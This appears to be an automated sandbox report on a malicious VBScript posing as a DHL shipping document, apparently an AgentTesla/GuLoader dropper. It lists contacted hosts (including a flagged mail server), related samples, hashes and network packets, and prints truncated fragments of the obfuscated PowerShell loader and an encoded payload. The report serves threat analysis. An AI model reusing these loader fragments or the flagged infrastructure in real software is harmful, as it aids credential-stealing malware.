                                    https://www.google.compowershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.ipify.orgwab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.mUypowershell.exe, 00000001.00000002.2329475776.000001D971C7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://crl.micropowershell.exe, 00000004.00000002.2122178024.0000000008510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://drive.google.com/wab.exe, 00000009.00000002.2928711448.0000000006AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://x1.c.lencr.org/0wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://x1.i.lencr.org/0wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contoso.com/powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://r3.o.lencr.org0wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://drive.google.compowershell.exe, 00000001.00000002.2198052956.000001D95B796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959829000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.usercontent.google.compowershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.2198052956.000001D959601000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://apis.google.compowershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2198052956.000001D959601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2108163000.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      114.142.162.17
                                                      		mail.cash4cars.nzAustralia
                                                      		133525SERVERMULE-AS-APNimbus2PtyLtdAUtrue
                                                      142.251.2.139
                                                      		drive.google.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      104.26.13.205
                                                      		api.ipify.orgUnited States
                                                      		13335CLOUDFLARENETUSfalse
                                                      142.251.2.132
                                                      		drive.usercontent.google.comUnited States
                                                      		15169GOOGLEUSfalse

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1430756
                                                      Start date and time:2024-04-24 06:48:02 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 27s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:DHL Shipping doc.vbs
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@12/7@5/4
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 88%
                                                      • Number of executed functions: 90
                                                      • Number of non-executed functions: 16
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 5932 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 6692 because it is empty
                                                      • Execution Graph export aborted for target wab.exe, PID 2668 because it is empty
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      06:48:50API Interceptor24516x Sleep call for process: powershell.exe modified
                                                      06:49:39API Interceptor39x Sleep call for process: wab.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      114.142.162.17http://otahuhumainstreet.co.nzGet hashmaliciousUnknownBrowse
                                                      • otahuhumainstreet.co.nz/
                                                      104.26.13.205SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                      • api.ipify.org/
                                                      Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                      • api.ipify.org/?format=json
                                                      ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                                      • api.ipify.org/?format=json
                                                      Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/?format=json
                                                      E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/
                                                      E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/
                                                      SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                      • api.ipify.org/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      api.ipify.orgpurchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      SecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                      • 172.67.74.152
                                                      https://wmicrosouab-4ba8.udydzj.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                      • 104.26.13.205
                                                      CR-FEDEX_TN-775720741041.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 172.67.74.152
                                                      BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      copy#10476235.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 172.67.74.152
                                                      Wire Transfer Payment Receipt#2024-22-04.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      DHL_RF_20200712_BN_OTN 0095673441.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.12.205
                                                      mail.cash4cars.nzG4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      charesworh.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      FAR.N#U00b02430-24000993.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      tems.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      justificante.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      Transferencia 4334300002017359pdf.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      20220830_ProtecoPTE.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSReconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.215.45
                                                      Remittance-Advice.docGet hashmaliciousUnknownBrowse
                                                      • 172.67.175.222
                                                      shipping docs.docGet hashmaliciousUnknownBrowse
                                                      • 104.21.74.191
                                                      Invoice.docGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.134.136
                                                      Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 172.67.152.117
                                                      purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                      • 104.21.65.24
                                                      BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      SecuriteInfo.com.Python.Stealer.1437.14994.32063.exeGet hashmaliciousPython StealerBrowse
                                                      • 172.67.74.152
                                                      SERVERMULE-AS-APNimbus2PtyLtdAUG4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      charesworh.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      FAR.N#U00b02430-24000993.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      tems.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 114.142.162.17
                                                      20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      justificante.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      Transferencia 4334300002017359pdf.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17
                                                      20220830_ProtecoPTE.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 114.142.162.17

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0eG4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.13.205
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      purchase order pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      PO 23JC0704-Rollease-B.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                                                      • 104.26.13.205
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      • 104.26.13.205
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      ScreenConnect.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      • 104.26.13.205
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      X1.exeGet hashmaliciousXWormBrowse
                                                      • 104.26.13.205
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                      • 104.26.13.205
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      X2.exeGet hashmaliciousXWormBrowse
                                                      • 104.26.13.205
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      37f463bf4616ecd445d4a1937da06e19G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      #U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnkGet hashmaliciousUnknownBrowse
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      181_960.msiGet hashmaliciousUnknownBrowse
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      UXNob1Dp32.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      3CB27VUHRg.exeGet hashmaliciousBabuk, DjvuBrowse
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      JfOWsh7v0r.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                      • 142.251.2.132
                                                      • 142.251.2.139
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 142.251.2.132
                                                      • 142.251.2.139

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):11608
                                                      Entropy (8bit):4.886255615007755
                                                      Encrypted:false
                                                      SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                      MD5:C7F7A26360E678A83AFAB85054B538EA
                                                      SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                      SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                      SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllultnxj:NllU
                                                      MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                      SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                      SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                      SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40azcxgo.inr.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfnafi35.syn.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ireixikg.yh2.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofsvltvo.wog.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\Aptychus.Whi

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):445624
                                                      Entropy (8bit):5.9619035408855785
                                                      Encrypted:false
                                                      SSDEEP:6144:DJFMovgaoi+8UkY21eOVPX4oP1TYnEfPb2NxPPWdZgRjRNnYb5E7WuxhsXQiRlfe:D1oaB+Svf1TR8aPb2NpQ+7WbQwJ8
                                                      MD5:18A60C1DA6907146EEA018203ACF5089
                                                      SHA1:01C5E653DBA0EDA7CABA355FEFFA97726515247C
                                                      SHA-256:1F5670E65D8367057D1CDC75DE0CA4B194CEF53AEE9311997B1D995ECF242B04
                                                      SHA-512:0EECA59FAC3845807F2DD8D921F15808187F37FB945B51B568120036A46EAEA7A076EEAB0785E95D05B6E972D80E326A7BAFF5E87E68BBA4621197D4E8670644
                                                      Malicious:false
                                                      Preview:cQGbcQGbu6p+HADrAg376wLuDwNcJATrAob9cQGbuYYMuiZxAZvrAhcLgfFzRaiG6wJpfesC9C+B6fVJEqDrAknEcQGbcQGb6wKro7qjTHJccQGbcQGb6wJ2dXEBmzHKcQGb6wKmCIkUC3EBm+sCKFzR4nEBm+sCGxKDwQTrAlfR6wKwIoH5FsRrAnzKcQGb6wKhN4tEJARxAZvrAp8HicPrAvI16wKWFoHD+xuyAesCuz9xAZu6iGrNFnEBm+sC8teB8v/DWGbrAiBq6wK+poHqd6mVcOsC+EhxAZvrAkIH6wIwTXEBm+sCnCiLDBBxAZvrAkkyiQwTcQGbcQGbQnEBm3EBm4H6hKkEAHXX6wK2F3EBm4lcJAxxAZvrAosCge0AAwAAcQGbcQGbi1QkCHEBm3EBm4t8JATrApOFcQGbievrAoyqcQGbgcOcAAAA6wLa4nEBm1PrAkQKcQGbakDrAsqucQGbievrAjSQcQGbx4MAAQAAAFCLAnEBm3EBm4HDAAEAAHEBm+sCEkNT6wKbGHEBm4nr6wIgjXEBm4m7BAEAAHEBm+sCrhuBwwQBAABxAZtxAZtTcQGbcQGbav/rAoiAcQGbg8IFcQGbcQGbMfZxAZvrAmxsMcnrApEC6wLPrIsa6wJxOusCba9B6wKg8XEBmzkcCnXz6wIFinEBm0ZxAZvrAs2KgHwK+7h13XEBm+sCKjGLRAr8cQGbcQGbKfBxAZtxAZv/0nEBm3EBm7qEqQQA6wK6rusCchcxwHEBm+sCaiSLfCQM6wIxTusC8leBNAffAbOs6wJ16usCS8eDwATrAhr96wLviDnQdeJxAZtxAZuJ++sCBZ/rAnZI/9dxAZvrAoXg5+46SRhEXMW600ktsu4s0okUMtkwTdyQioDGQ1mL9ByT/v5DqvuLZIqIVpQduDR+bv0yXXQR5uZbwzJtoPUZQF7oIBpQouMURU1HpOKHs6zfDj/RSgWz9BhFvqy687O7XkW+

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with very long lines (352), with CRLF line terminators
                                                      Entropy (8bit):5.352663701232987
                                                      TrID:
                                                      • Visual Basic Script (13500/0) 100.00%
                                                      File name:DHL Shipping doc.vbs
                                                      File size:8'414 bytes
                                                      MD5:e483b9251c12c243495cc209ff1fa8e1
                                                      SHA1:3b1d7bdc1563c60ea44c9dd410018879fa1e392e
                                                      SHA256:ab7caea9be94fcd8bf2b3bb9a1da2fbc4af30134a190718ffd81cdb4cc9a3641
                                                      SHA512:c9d89fd7ddbe2ceaff82228c26a86c399fa1b4553398ac9ce4ec0dc4be80cb79ec90e6f4f8f0f6f2c72bc9e6cd8adc7335d2d19ae6200c6342879c01a31c7139
                                                      SSDEEP:192:UmydX+3iccHl8m3OtcUm+6/TAizc7OfG4:KuIl8m+GUcASfG4
                                                      TLSH:DD023B84C5121E854BD37EA22F15A612C818CD17DB3CCDE97913F19E3E83E9D326642E
                                                      File Content Preview:.. ..Function mntindkast ......B8 = B8 & "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effe

                                                      File Icon

                                                      Icon Hash:68d69b8f86ab9a86

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 24, 2024 06:48:52.061404943 CEST49730443192.168.2.4142.251.2.139
                                                      Apr 24, 2024 06:48:52.061455965 CEST44349730142.251.2.139192.168.2.4
                                                      Apr 24, 2024 06:48:52.061584949 CEST49730443192.168.2.4142.251.2.139
                                                      Apr 24, 2024 06:48:52.086378098 CEST49730443192.168.2.4142.251.2.139
                                                      Apr 24, 2024 06:48:52.086416006 CEST44349730142.251.2.139192.168.2.4
                                                      Apr 24, 2024 06:48:52.452665091 CEST44349730142.251.2.139192.168.2.4
                                                      Apr 24, 2024 06:48:52.452815056 CEST49730443192.168.2.4142.251.2.139
                                                      Apr 24, 2024 06:48:52.454236984 CEST44349730142.251.2.139192.168.2.4
                                                      Apr 24, 2024 06:48:52.454313993 CEST49730443192.168.2.4142.251.2.139
                                                      Apr 24, 2024 06:48:52.457166910 CEST49730443192.168.2.4142.251.2.139
                                                      Apr 24, 2024 06:48:52.457194090 CEST44349730142.251.2.139192.168.2.4
                                                      Apr 24, 2024 06:48:52.457722902 CEST44349730142.251.2.139192.168.2.4
                                                      Apr 24, 2024 06:48:52.469543934 CEST49730443192.168.2.4142.251.2.139
                                                      Apr 24, 2024 06:48:52.512120962 CEST44349730142.251.2.139192.168.2.4
                                                      Apr 24, 2024 06:48:52.847141027 CEST44349730142.251.2.139192.168.2.4
                                                      Apr 24, 2024 06:48:52.847233057 CEST49730443192.168.2.4142.251.2.139
